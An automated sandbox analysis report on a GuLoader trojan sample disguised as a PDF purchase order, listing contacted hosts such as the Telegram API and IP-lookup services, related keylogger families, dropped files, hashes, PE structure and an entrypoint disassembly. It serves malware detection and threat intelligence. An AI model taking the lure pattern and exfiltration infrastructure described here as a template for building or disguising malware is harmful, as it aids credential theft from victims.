Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
55% | ReversingLabs | Win32.Trojan.Guloader |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
drive.google.com | 216.58.208.238 | true | false | high | |
drive.usercontent.google.com | 172.217.17.65 | true | false | high | |
reallyfreegeoip.org | 104.21.67.152 | true | false | high | |
api.telegram.org | 149.154.167.220 | true | false | high | |
checkip.dyndns.com | 132.226.247.73 | true | false | high | |
checkip.dyndns.org | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high |
false | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false |
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false |
172.217.17.65 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
216.58.208.238 | drive.google.com | United States | 15169 | GOOGLEUS | false |
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1578319 |
Start date and time: | 2024-12-19 15:28:06 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 44s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 5 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@3/8@6/5 |
EGA Information: |
HCA Information: |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: PURCHASE ORDER TRC-090971819130-24_pdf.exe
Time | Type | Description |
---|---|---|
09:29:39 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
149.154.167.220 | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Can Stealer | Browse | |||
Get hash | malicious | Can Stealer | Browse | |||
104.21.67.152 | Get hash | malicious | GuLoader, Snake Keylogger | Browse | ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
132.226.247.73 | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | ||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
checkip.dyndns.com | Get hash | malicious | GuLoader, Snake Keylogger | Browse | ||
Get hash | malicious | MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
reallyfreegeoip.org | Get hash | malicious | GuLoader, Snake Keylogger | Browse | ||
Get hash | malicious | MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
api.telegram.org | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | Browse | |||
Get hash | malicious | Can Stealer | Browse | |||
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELEGRAMRU | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | ||
Get hash | malicious | Vidar | Browse | |||
Get hash | malicious | Vidar | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
CLOUDFLARENETUS | Get hash | malicious | HTMLPhisher | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Abobus Obfuscator, Braodo | Browse | |||
Get hash | malicious | Abobus Obfuscator, Braodo | Browse | |||
Get hash | malicious | Abobus Obfuscator, Braodo | Browse | |||
UTMEMUS | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | ||
Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | VIP Keylogger | Browse | |||
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | GuLoader, Snake Keylogger | Browse | ||
Get hash | malicious | MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Abobus Obfuscator, Braodo | Browse | |||
Get hash | malicious | Abobus Obfuscator, Braodo | Browse | |||
Get hash | malicious | Abobus Obfuscator, Braodo | Browse | |||
Get hash | malicious | Abobus Obfuscator, Braodo | Browse | |||
Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | Browse | |||
Get hash | malicious | Unknown | Browse | |||
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | GuLoader, RHADAMANTHYS | Browse | |||
Get hash | malicious | GuLoader, RHADAMANTHYS | Browse | |||
Get hash | malicious | GuLoader, RHADAMANTHYS | Browse | |||
Get hash | malicious | GuLoader, RHADAMANTHYS | Browse | |||
Get hash | malicious | GuLoader, RHADAMANTHYS | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger | Browse | |||
Get hash | malicious | RHADAMANTHYS | Browse | |||
Get hash | malicious | RHADAMANTHYS | Browse | |||
Get hash | malicious | RHADAMANTHYS | Browse | |||
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dll | Get hash | malicious | GuLoader, MassLogger RAT | Browse | ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | GuLoader | Browse |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\Normalfordelingernes.Tep
Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286557 |
Entropy (8bit): | 7.770343888910271 |
Encrypted: | false |
SSDEEP: | 6144:9+IYOsNolNiweVFXz/H3qABowdHC6giUXb2vq1pk:YIYOsNoCz/HjnHC6gis2cu |
MD5: | 42F88ECDCF508CA1F030AB99654B1B94 |
SHA1: | F2D3F277A442D52BEAC7D580F54965B52B7A1DA9 |
SHA-256: | AC87B5B811677F1A060BDF7600FD496C3FE7206E477AF66E9E87E8E31494A414 |
SHA-512: | 2ACD83002BF2A2978E6867E0DD6E8C63B558F5B46A8F09C93DA7E324E6D4A4A11E9D9F59CDE92ABFFC7CB67CF270945C3DDDA974AAE5A62F4D91A643E8BED197 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\Riprap43.gaw
Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 56641 |
Entropy (8bit): | 1.2318917163845036 |
Encrypted: | false |
SSDEEP: | 384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq |
MD5: | 39C9A5F767D8C170B5CE38EA8D5734D4 |
SHA1: | 4B4CA81EB3D093645B504004F62A269D4EACDECC |
SHA-256: | 87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49 |
SHA-512: | AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\Unvenom.Lib
Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 100679 |
Entropy (8bit): | 4.621278860713537 |
Encrypted: | false |
SSDEEP: | 3072:WNPMSzD4yit9jfrvktCtUkSbywTZpryomlD:WNloyK9zbWO/miD |
MD5: | 93A2D636570664ED4B7EE832BC0032E3 |
SHA1: | 235EDA5D6FF2BBA8924B02201A19F363CE45C1AE |
SHA-256: | 2950A96C82C080B013E477AC109CEA7823019329145AE64F81532B93C46C6480 |
SHA-512: | EF4887A3A677B0F165E039AD891F2A4091A415ED234B6A9912EB7556B5CD1F2A2B69A5D2D783C225BC98D14BEE87AE84105B745DC62414462FE296FC047B489A |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\forskansningens.txt
Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 345 |
Entropy (8bit): | 4.241929841155785 |
Encrypted: | false |
SSDEEP: | 6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA |
MD5: | AE69FE0F4D1E1115BC470031E661785C |
SHA1: | 8D3799826FE457C61C1E8EE5E3071683A8125BC5 |
SHA-256: | 6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE |
SHA-512: | 969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\fyldebtten.soi
Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 210366 |
Entropy (8bit): | 1.240975322465592 |
Encrypted: | false |
SSDEEP: | 768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA |
MD5: | AEF78D8D561E8802286A78AAC6C73ED6 |
SHA1: | DDF5DA649482D0A553802827BB9F0EF64A7069E1 |
SHA-256: | 45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE |
SHA-512: | 93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\wildwestfilm.sto
Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 363811 |
Entropy (8bit): | 1.2512349423386382 |
Encrypted: | false |
SSDEEP: | 768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq |
MD5: | BFEA15C03AB295424981A73637A19491 |
SHA1: | A5ADABDDC373D6B3004F96946D84B651E42D9F5C |
SHA-256: | 83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B |
SHA-512: | CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11776 |
Entropy (8bit): | 5.655335921632966 |
Encrypted: | false |
SSDEEP: | 192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9 |
MD5: | EE260C45E97B62A5E42F17460D406068 |
SHA1: | DF35F6300A03C4D3D3BD69752574426296B78695 |
SHA-256: | E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27 |
SHA-512: | A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3 |
Malicious: | false |
Antivirus: |
Joe Sandbox View: |
Preview: |
Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1180 |
Entropy (8bit): | 3.2746695656782077 |
Encrypted: | false |
SSDEEP: | 12:8wl0+sXU1e/tz0/CSL6/cBnwgXl341DEDeG41DEDWBQ1olfW+kjcmAaxCalCNfBh:8FvWLrFPjPKmizZMxnkjqy |
MD5: | 823719C88FF1294851DE589A3B80552F |
SHA1: | D49CE16897A1B57A73E4A035925757D49ECD619B |
SHA-256: | 0228C01257EEAEDA4C18F9C02C68F8EFA1A0A1C03A2E264733D162D6570B599B |
SHA-512: | 34A74AE2912256C7CE80805A2548A758A99BC2C098E417FF11B286451F998374184811819979E83FDF08DC3E592A76D1981293501A96909FCC86EE79B628710F |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.963673421473499 |
TrID: |
File name: | PURCHASE ORDER TRC-090971819130-24_pdf.exe |
File size: | 477'600 bytes |
MD5: | 745504717878bb22b600df7e2c2dd9f4 |
SHA1: | 9515d0277803511a4f401674f40f022ed69c85d7 |
SHA256: | 8a4d38092e7f0245aa376d724cf3dbe08d4b563a86db3c99e70defaa38beb969 |
SHA512: | 8035ff6f18deaaec620acd824bbcecf07d38f2e2f77e322942f635320af75bbc4bd60250f0e61094eed22cfeef652791d61476bd7b4c613ebb6fb7952ae48e4d |
SSDEEP: | 12288:I5AlMIL/obq71R7Oj6rgcPIcXuQd7lxu7Jj1JK8s5FEeKN:ZtL/o2BR7Zrgcwgpxu7Jj1Jiceg |
TLSH: | 36A42301A510D743D16114764C326FAEBAADB768DAA52F07278C2D053F336A2CD2FD9A |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d......... |
Icon Hash: | 3d2e0f95332b3399 |
Entrypoint: | 0x4032a0 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x567F847F [Sun Dec 27 06:26:07 2015 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | d4b94e8ee3f620a89d114b9da4b31873 |
Instruction |
---|
sub esp, 000002D4h |
push ebp |
push esi |
push 00000020h |
xor ebp, ebp |
pop esi |
mov dword ptr [esp+0Ch], ebp |
push 00008001h |
mov dword ptr [esp+0Ch], 0040A300h |
mov dword ptr [esp+18h], ebp |
call dword ptr [004080B0h] |
call dword ptr [004080ACh] |
cmp ax, 00000006h |
je 00007F00C4EFBE53h |
push ebp |
call 00007F00C4EFEF96h |
cmp eax, ebp |
je 00007F00C4EFBE49h |
push 00000C00h |
call eax |
push ebx |
push edi |
push 0040A2F4h |
call 00007F00C4EFEF13h |
push 0040A2ECh |
call 00007F00C4EFEF09h |
push 0040A2E0h |
call 00007F00C4EFEEFFh |
push 00000009h |
call 00007F00C4EFEF64h |
push 00000007h |
call 00007F00C4EFEF5Dh |
mov dword ptr [00434F04h], eax |
call dword ptr [00408044h] |
push ebp |
call dword ptr [004082A8h] |
mov dword ptr [00434FB8h], eax |
push ebp |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebp |
push 0042B228h |
call dword ptr [0040818Ch] |
push 0040A2C8h |
push 00433F00h |
call 00007F00C4EFEB4Ah |
call dword ptr [004080A8h] |
mov ebx, 0043F000h |
push eax |
push ebx |
call 00007F00C4EFEB38h |
push ebp |
call dword ptr [00408178h] |
Programming Language: |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x85c8 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5d000 | 0x11e0 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b8 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x637c | 0x6400 | 83ff228d6dae8dd738eb2f78afbc793f | False | 0.672421875 | data | 6.491609540807675 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x147c | 0x1600 | d9f9b0b330e238260616b62a7a3cac09 | False | 0.42933238636363635 | data | 4.973928345594701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x2aff8 | 0x600 | 3f2b05c8fbb8b2e4c9c89e93d30e7252 | False | 0.53125 | data | 4.133631086111171 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x35000 | 0x28000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x5d000 | 0x11e0 | 0x1200 | 20639f4e7c421f5379e2fb9ea4a1530d | False | 0.3684895833333333 | data | 4.485045860065118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_BITMAP | 0x5d268 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174 |
RT_ICON | 0x5d5d0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894 |
RT_DIALOG | 0x5d8b8 | 0x144 | data | English | United States | 0.5216049382716049 |
RT_DIALOG | 0x5da00 | 0x13c | data | English | United States | 0.5506329113924051 |
RT_DIALOG | 0x5db40 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x5dc40 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x5dd60 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x5de28 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x5de88 | 0x14 | data | English | United States | 1.2 |
RT_MANIFEST | 0x5dea0 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447 |
DLL | Import |
---|---|
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
